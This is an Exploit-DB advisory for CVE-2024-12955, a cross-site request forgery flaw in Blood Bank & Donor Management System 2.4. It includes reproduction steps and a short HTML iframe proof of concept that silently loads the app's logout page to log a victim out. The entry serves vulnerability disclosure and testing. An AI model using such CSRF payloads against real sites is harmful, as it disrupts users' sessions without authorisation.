Blood Bank & Donor Management System 2.4 - CSRF Improper Input Validation

EDB-ID:

52256

CVE:

2024-12955

EDB Verified:

Author:

Kwangyun Keum

Type:

webapps

Exploit: /

Platform:

Multiple

Date:

2025-04-17

Vulnerable App:

#Exploit Title: Blood Bank & Donor Management System 2.4 - CSRF Improper
Input Validation
# Google Dork: N/A
# Date: 2024-12-26
# Exploit Author: Kwangyun Keum
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/blood-bank-donor-management-system/
# Version: 2.4
# Tested on: Windows 10 / Kali Linux with Apache and MySQL
# CVE: CVE-2024-12955

## Description:
Blood Bank & Donor Management System v2.4 suffers from a Cross-Site Request
Forgery (CSRF) vulnerability due to the absence of CSRF tokens for critical
functionalities such as logout. An attacker can craft a malicious iframe
embedding the logout URL and trick a victim into clicking it. This results
in the victim being logged out without their consent.

## Steps to Reproduce:
1. Deploy Blood Bank & Donor Management System v2.4.
2. Log in as any user.
3. Use the following PoC to demonstrate the issue:

   ```html
   <html>
     <body>
       <iframe
         src="http://localhost/bbdms/logout.php"
         style="border:0px #FFFFFF none;"
         name="myLogoutFrame"
         scrolling="no"
         frameborder="1"
         marginheight="0px"
         marginwidth="0px"
         height="400px"
         width="600px"
         allowfullscreen>
       </iframe>
     </body>
   </html>
4. Save the above HTML code as logout_poc.html.
5.Open the file in a browser and click anywhere on the page to trigger the
logout.

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services